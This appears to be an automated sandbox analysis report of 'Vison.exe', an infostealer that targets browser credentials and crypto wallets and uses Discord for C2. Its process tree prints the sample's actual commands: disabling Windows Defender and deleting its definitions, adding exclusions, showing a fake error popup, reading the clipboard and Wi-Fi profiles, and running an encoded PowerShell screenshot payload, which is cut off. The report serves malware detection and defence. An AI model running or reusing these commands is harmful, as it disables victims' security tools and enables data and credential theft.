9f759401103fec2ea5a9f9fa5e59737f43f539fcd8c77a871aedfb794a300188

Analysis

max time kernel
32s
max time network
35s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
15-11-2024 10:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Vison.exe
Size

7.4MB
MD5

29aff313affb2aeaff208bdbe3e43a0e
SHA1

512284d457053a82c7217256f50d889a792a7a21
SHA256

9f759401103fec2ea5a9f9fa5e59737f43f539fcd8c77a871aedfb794a300188
SHA512

a2dca9743e4c5f17ad33fd0aecc406d76f615b0db2f317db0b679f137ce7906e15b3c0254bdb49488a8760eb510420a1f7bc9c35049a5d840448e2c591aabf24
SSDEEP

98304:xXSi8x9XQsWsNurErvz81LpWjjUa50ZtPvYRt2e4GFNGjfzfbIbApJo4EAKhOC1M:xiP9VWWurErvI9pWjgfPvzm6gsFE14A

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
1832	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5056	powershell.exe
2408	powershell.exe
472	powershell.exe
2944	powershell.exe
3688	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3336	cmd.exe
4080	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4876	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3716	Vison.exe
3716	Vison.exe
3716	Vison.exe
3716	Vison.exe
3716	Vison.exe
3716	Vison.exe
3716	Vison.exe
3716	Vison.exe
3716	Vison.exe
3716	Vison.exe
3716	Vison.exe
3716	Vison.exe
3716	Vison.exe
3716	Vison.exe
3716	Vison.exe
3716	Vison.exe
3716	Vison.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
18	discord.com
26	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
1032	tasklist.exe
2404	tasklist.exe
1652	tasklist.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0028000000045091-21.dat	upx
behavioral1/memory/3716-25-0x00007FFB79A40000-0x00007FFB7A032000-memory.dmp	upx
behavioral1/files/0x002800000004508f-29.dat	upx
behavioral1/files/0x0028000000045084-28.dat	upx
behavioral1/memory/3716-48-0x00007FFB92630000-0x00007FFB9263F000-memory.dmp	upx
behavioral1/memory/3716-47-0x00007FFB8E480000-0x00007FFB8E4A4000-memory.dmp	upx
behavioral1/files/0x002800000004508b-46.dat	upx
behavioral1/files/0x002800000004508a-45.dat	upx
behavioral1/files/0x0028000000045089-44.dat	upx
behavioral1/files/0x0028000000045088-43.dat	upx
behavioral1/files/0x0028000000045087-42.dat	upx
behavioral1/files/0x0028000000045086-41.dat	upx
behavioral1/files/0x0028000000045085-40.dat	upx
behavioral1/files/0x0028000000045083-39.dat	upx
behavioral1/files/0x0028000000045096-38.dat	upx
behavioral1/files/0x0028000000045095-37.dat	upx
behavioral1/files/0x0028000000045094-36.dat	upx
behavioral1/files/0x0028000000045090-33.dat	upx
behavioral1/files/0x002800000004508e-32.dat	upx
behavioral1/memory/3716-54-0x00007FFB895C0000-0x00007FFB895ED000-memory.dmp	upx
behavioral1/memory/3716-56-0x00007FFB89B00000-0x00007FFB89B19000-memory.dmp	upx
behavioral1/memory/3716-58-0x00007FFB89380000-0x00007FFB893A3000-memory.dmp	upx
behavioral1/memory/3716-60-0x00007FFB798C0000-0x00007FFB79A3E000-memory.dmp	upx
behavioral1/memory/3716-64-0x00007FFB8E3E0000-0x00007FFB8E3ED000-memory.dmp	upx
behavioral1/memory/3716-72-0x00007FFB79390000-0x00007FFB798B9000-memory.dmp	upx
behavioral1/memory/3716-71-0x00007FFB88CA0000-0x00007FFB88CD3000-memory.dmp	upx
behavioral1/memory/3716-78-0x00007FFB89850000-0x00007FFB8985D000-memory.dmp	upx
behavioral1/memory/3716-83-0x00007FFB79270000-0x00007FFB7938C000-memory.dmp	upx
behavioral1/memory/3716-77-0x00007FFB89080000-0x00007FFB89094000-memory.dmp	upx
behavioral1/memory/3716-74-0x00007FFB82290000-0x00007FFB8235D000-memory.dmp	upx
behavioral1/memory/3716-70-0x00007FFB8E480000-0x00007FFB8E4A4000-memory.dmp	upx
behavioral1/memory/3716-69-0x00007FFB79A40000-0x00007FFB7A032000-memory.dmp	upx
behavioral1/memory/3716-63-0x00007FFB89250000-0x00007FFB89269000-memory.dmp	upx
behavioral1/memory/3716-84-0x00007FFB89B00000-0x00007FFB89B19000-memory.dmp	upx
behavioral1/memory/3716-85-0x00007FFB89380000-0x00007FFB893A3000-memory.dmp	upx
behavioral1/memory/3716-181-0x00007FFB798C0000-0x00007FFB79A3E000-memory.dmp	upx
behavioral1/memory/3716-182-0x00007FFB89250000-0x00007FFB89269000-memory.dmp	upx
behavioral1/memory/3716-235-0x00007FFB88CA0000-0x00007FFB88CD3000-memory.dmp	upx
behavioral1/memory/3716-236-0x00007FFB79390000-0x00007FFB798B9000-memory.dmp	upx
behavioral1/memory/3716-276-0x00007FFB82290000-0x00007FFB8235D000-memory.dmp	upx
behavioral1/memory/3716-300-0x00007FFB8E480000-0x00007FFB8E4A4000-memory.dmp	upx
behavioral1/memory/3716-299-0x00007FFB79A40000-0x00007FFB7A032000-memory.dmp	upx
behavioral1/memory/3716-305-0x00007FFB798C0000-0x00007FFB79A3E000-memory.dmp	upx
behavioral1/memory/3716-350-0x00007FFB79A40000-0x00007FFB7A032000-memory.dmp	upx
behavioral1/memory/3716-365-0x00007FFB79A40000-0x00007FFB7A032000-memory.dmp	upx
behavioral1/memory/3716-390-0x00007FFB79390000-0x00007FFB798B9000-memory.dmp	upx
behavioral1/memory/3716-389-0x00007FFB88CA0000-0x00007FFB88CD3000-memory.dmp	upx
behavioral1/memory/3716-388-0x00007FFB89250000-0x00007FFB89269000-memory.dmp	upx
behavioral1/memory/3716-387-0x00007FFB8E3E0000-0x00007FFB8E3ED000-memory.dmp	upx
behavioral1/memory/3716-386-0x00007FFB798C0000-0x00007FFB79A3E000-memory.dmp	upx
behavioral1/memory/3716-385-0x00007FFB89380000-0x00007FFB893A3000-memory.dmp	upx
behavioral1/memory/3716-384-0x00007FFB89B00000-0x00007FFB89B19000-memory.dmp	upx
behavioral1/memory/3716-383-0x00007FFB895C0000-0x00007FFB895ED000-memory.dmp	upx
behavioral1/memory/3716-382-0x00007FFB8E480000-0x00007FFB8E4A4000-memory.dmp	upx
behavioral1/memory/3716-381-0x00007FFB92630000-0x00007FFB9263F000-memory.dmp	upx
behavioral1/memory/3716-380-0x00007FFB82290000-0x00007FFB8235D000-memory.dmp	upx
behavioral1/memory/3716-379-0x00007FFB79270000-0x00007FFB7938C000-memory.dmp	upx
behavioral1/memory/3716-378-0x00007FFB89850000-0x00007FFB8985D000-memory.dmp	upx
behavioral1/memory/3716-377-0x00007FFB89080000-0x00007FFB89094000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3216	cmd.exe
60	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3524	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2508	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 43 IoCs

pid	Process
2408	powershell.exe
2408	powershell.exe
1772	WMIC.exe
1772	WMIC.exe
1772	WMIC.exe
1772	WMIC.exe
2944	powershell.exe
2944	powershell.exe
4080	powershell.exe
4080	powershell.exe
2408	powershell.exe
3688	powershell.exe
3688	powershell.exe
3808	powershell.exe
3808	powershell.exe
4080	powershell.exe
2944	powershell.exe
3688	powershell.exe
3808	powershell.exe
472	powershell.exe
472	powershell.exe
880	powershell.exe
880	powershell.exe
3172	WMIC.exe
3172	WMIC.exe
3172	WMIC.exe
3172	WMIC.exe
4312	WMIC.exe
4312	WMIC.exe
4312	WMIC.exe
4312	WMIC.exe
2028	WMIC.exe
2028	WMIC.exe
2028	WMIC.exe
2028	WMIC.exe
5056	powershell.exe
5056	powershell.exe
3524	WMIC.exe
3524	WMIC.exe
3524	WMIC.exe
3524	WMIC.exe
804	powershell.exe
804	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeDebugPrivilege	2404	tasklist.exe
Token: SeDebugPrivilege	1032	tasklist.exe
Token: SeDebugPrivilege	2944	powershell.exe
Token: SeIncreaseQuotaPrivilege	1772	WMIC.exe
Token: SeSecurityPrivilege	1772	WMIC.exe
Token: SeTakeOwnershipPrivilege	1772	WMIC.exe
Token: SeLoadDriverPrivilege	1772	WMIC.exe
Token: SeSystemProfilePrivilege	1772	WMIC.exe
Token: SeSystemtimePrivilege	1772	WMIC.exe
Token: SeProfSingleProcessPrivilege	1772	WMIC.exe
Token: SeIncBasePriorityPrivilege	1772	WMIC.exe
Token: SeCreatePagefilePrivilege	1772	WMIC.exe
Token: SeBackupPrivilege	1772	WMIC.exe
Token: SeRestorePrivilege	1772	WMIC.exe
Token: SeShutdownPrivilege	1772	WMIC.exe
Token: SeDebugPrivilege	1772	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1772	WMIC.exe
Token: SeRemoteShutdownPrivilege	1772	WMIC.exe
Token: SeUndockPrivilege	1772	WMIC.exe
Token: SeManageVolumePrivilege	1772	WMIC.exe
Token: 33	1772	WMIC.exe
Token: 34	1772	WMIC.exe
Token: 35	1772	WMIC.exe
Token: 36	1772	WMIC.exe
Token: SeDebugPrivilege	1652	tasklist.exe
Token: SeDebugPrivilege	4080	powershell.exe
Token: SeDebugPrivilege	3688	powershell.exe
Token: SeIncreaseQuotaPrivilege	1772	WMIC.exe
Token: SeSecurityPrivilege	1772	WMIC.exe
Token: SeTakeOwnershipPrivilege	1772	WMIC.exe
Token: SeLoadDriverPrivilege	1772	WMIC.exe
Token: SeSystemProfilePrivilege	1772	WMIC.exe
Token: SeSystemtimePrivilege	1772	WMIC.exe
Token: SeProfSingleProcessPrivilege	1772	WMIC.exe
Token: SeIncBasePriorityPrivilege	1772	WMIC.exe
Token: SeCreatePagefilePrivilege	1772	WMIC.exe
Token: SeBackupPrivilege	1772	WMIC.exe
Token: SeRestorePrivilege	1772	WMIC.exe
Token: SeShutdownPrivilege	1772	WMIC.exe
Token: SeDebugPrivilege	1772	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1772	WMIC.exe
Token: SeRemoteShutdownPrivilege	1772	WMIC.exe
Token: SeUndockPrivilege	1772	WMIC.exe
Token: SeManageVolumePrivilege	1772	WMIC.exe
Token: 33	1772	WMIC.exe
Token: 34	1772	WMIC.exe
Token: 35	1772	WMIC.exe
Token: 36	1772	WMIC.exe
Token: SeDebugPrivilege	3808	powershell.exe
Token: SeIncreaseQuotaPrivilege	2408	powershell.exe
Token: SeSecurityPrivilege	2408	powershell.exe
Token: SeTakeOwnershipPrivilege	2408	powershell.exe
Token: SeLoadDriverPrivilege	2408	powershell.exe
Token: SeSystemProfilePrivilege	2408	powershell.exe
Token: SeSystemtimePrivilege	2408	powershell.exe
Token: SeProfSingleProcessPrivilege	2408	powershell.exe
Token: SeIncBasePriorityPrivilege	2408	powershell.exe
Token: SeCreatePagefilePrivilege	2408	powershell.exe
Token: SeBackupPrivilege	2408	powershell.exe
Token: SeRestorePrivilege	2408	powershell.exe
Token: SeShutdownPrivilege	2408	powershell.exe
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeSystemEnvironmentPrivilege	2408	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4404 wrote to memory of 3716	4404	Vison.exe	83
PID 4404 wrote to memory of 3716	4404	Vison.exe	83
PID 3716 wrote to memory of 464	3716	Vison.exe	84
PID 3716 wrote to memory of 464	3716	Vison.exe	84
PID 3716 wrote to memory of 2080	3716	Vison.exe	85
PID 3716 wrote to memory of 2080	3716	Vison.exe	85
PID 3716 wrote to memory of 4720	3716	Vison.exe	86
PID 3716 wrote to memory of 4720	3716	Vison.exe	86
PID 3716 wrote to memory of 4964	3716	Vison.exe	90
PID 3716 wrote to memory of 4964	3716	Vison.exe	90
PID 3716 wrote to memory of 1912	3716	Vison.exe	93
PID 3716 wrote to memory of 1912	3716	Vison.exe	93
PID 3716 wrote to memory of 4960	3716	Vison.exe	94
PID 3716 wrote to memory of 4960	3716	Vison.exe	94
PID 3716 wrote to memory of 4332	3716	Vison.exe	97
PID 3716 wrote to memory of 4332	3716	Vison.exe	97
PID 3716 wrote to memory of 3336	3716	Vison.exe	98
PID 3716 wrote to memory of 3336	3716	Vison.exe	98
PID 3716 wrote to memory of 1728	3716	Vison.exe	100
PID 3716 wrote to memory of 1728	3716	Vison.exe	100
PID 2080 wrote to memory of 2408	2080	cmd.exe	103
PID 2080 wrote to memory of 2408	2080	cmd.exe	103
PID 3716 wrote to memory of 3160	3716	Vison.exe	104
PID 3716 wrote to memory of 3160	3716	Vison.exe	104
PID 3716 wrote to memory of 3216	3716	Vison.exe	105
PID 3716 wrote to memory of 3216	3716	Vison.exe	105
PID 3716 wrote to memory of 4880	3716	Vison.exe	107
PID 3716 wrote to memory of 4880	3716	Vison.exe	107
PID 4720 wrote to memory of 3764	4720	cmd.exe	110
PID 4720 wrote to memory of 3764	4720	cmd.exe	110
PID 464 wrote to memory of 2944	464	cmd.exe	111
PID 464 wrote to memory of 2944	464	cmd.exe	111
PID 1912 wrote to memory of 2404	1912	cmd.exe	112
PID 1912 wrote to memory of 2404	1912	cmd.exe	112
PID 4960 wrote to memory of 1032	4960	cmd.exe	113
PID 4960 wrote to memory of 1032	4960	cmd.exe	113
PID 3716 wrote to memory of 1536	3716	Vison.exe	114
PID 3716 wrote to memory of 1536	3716	Vison.exe	114
PID 4332 wrote to memory of 1772	4332	cmd.exe	151
PID 4332 wrote to memory of 1772	4332	cmd.exe	151
PID 3336 wrote to memory of 4080	3336	cmd.exe	116
PID 3336 wrote to memory of 4080	3336	cmd.exe	116
PID 1728 wrote to memory of 1652	1728	cmd.exe	117
PID 1728 wrote to memory of 1652	1728	cmd.exe	117
PID 3216 wrote to memory of 60	3216	cmd.exe	119
PID 3216 wrote to memory of 60	3216	cmd.exe	119
PID 3160 wrote to memory of 2676	3160	cmd.exe	120
PID 3160 wrote to memory of 2676	3160	cmd.exe	120
PID 4964 wrote to memory of 3688	4964	cmd.exe	121
PID 4964 wrote to memory of 3688	4964	cmd.exe	121
PID 4880 wrote to memory of 2508	4880	cmd.exe	123
PID 4880 wrote to memory of 2508	4880	cmd.exe	123
PID 3716 wrote to memory of 3740	3716	Vison.exe	124
PID 3716 wrote to memory of 3740	3716	Vison.exe	124
PID 1536 wrote to memory of 3808	1536	cmd.exe	126
PID 1536 wrote to memory of 3808	1536	cmd.exe	126
PID 3740 wrote to memory of 4876	3740	cmd.exe	157
PID 3740 wrote to memory of 4876	3740	cmd.exe	157
PID 3716 wrote to memory of 3140	3716	Vison.exe	128
PID 3716 wrote to memory of 3140	3716	Vison.exe	128
PID 3140 wrote to memory of 2672	3140	cmd.exe	130
PID 3140 wrote to memory of 2672	3140	cmd.exe	130
PID 3716 wrote to memory of 3328	3716	Vison.exe	132
PID 3716 wrote to memory of 3328	3716	Vison.exe	132

C:\Users\Admin\AppData\Local\Temp\Vison.exe
"C:\Users\Admin\AppData\Local\Temp\Vison.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4404
- C:\Users\Admin\AppData\Local\Temp\Vison.exe
  "C:\Users\Admin\AppData\Local\Temp\Vison.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Vison.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:464
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Vison.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2080
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2408
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:1832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('build.dll Not Found', 0, 'error', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4720
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('build.dll Not Found', 0, 'error', 0+16);close()"
      4⤵
      PID:3764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ ‎ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ ‎ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1912
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4960
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4332
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3336
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1728
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3160
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:3216
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:60
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4880
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMA